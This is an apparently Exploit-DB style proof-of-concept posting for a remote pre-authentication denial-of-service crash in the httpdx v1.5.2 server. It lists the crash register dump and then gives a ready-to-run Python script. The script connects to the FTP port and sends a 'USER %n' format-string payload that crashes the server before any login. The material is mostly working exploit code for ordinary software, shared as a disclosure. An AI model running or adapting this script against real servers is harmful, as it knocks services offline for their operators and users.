# Title: httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)
# Found by: loneferret
# Hat's off to dookie2000ca
# Date: 06/02/2010
# Software link: http://httpdx.sourceforge.net/downloads/
# Tested on: Windows XP SP3 Professional

# Nod to the Exploit-DB Team

#EAX 00000000
#ECX 00000005
#EDX 003E39AC
#EBX 003EC96E
#ESP 0186B7F4
#EBP 0186BA60
#ESI 0186B83C
#EDI 003EC997 ASCII " "
#EIP 77C42AC4 msvcrt.77C42AC4
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFD8000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)

#!/usr/bin/python

import socket

buffer = "\x25\x6e"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))  #Remember to put in the server's address
s.recv(1024)
s.send('USER '+ buffer +'\r\n') #yup, doesn't take much does it.
s.recv(1024) #
s.close      #don't really need these, force of habit